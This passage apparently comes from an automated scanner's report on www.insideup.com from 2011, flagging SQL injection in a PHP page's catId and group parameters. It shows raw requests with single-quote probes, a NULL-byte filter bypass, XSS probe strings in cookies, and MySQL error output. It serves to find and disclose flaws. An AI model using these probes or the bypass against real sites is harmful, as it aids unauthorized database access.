OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:41:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ro6p0vrjsfcbthdc8lq21iuqi3; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/fist00/project_dynamic_page_updated.php'' was not found on this server.</p>

1.307. http://www.insideup.com/ppc/leadflow/fist00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php?catId=10003'&group=fist00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2n457h402uriachthmsk4njo56; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/fist00/project_dynamic_page_updated.php?catId=10003'&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003'&group=fist00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00/project_dyna' at line 5

Request 2

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php?catId=10003''&group=fist00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v9jagtseag7570h6kc3a6srl97; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.308. http://www.insideup.com/ppc/leadflow/fist00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00%00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=80icemleaoecoib025acob9kb5; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00.'&template=3' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00.'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00%00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 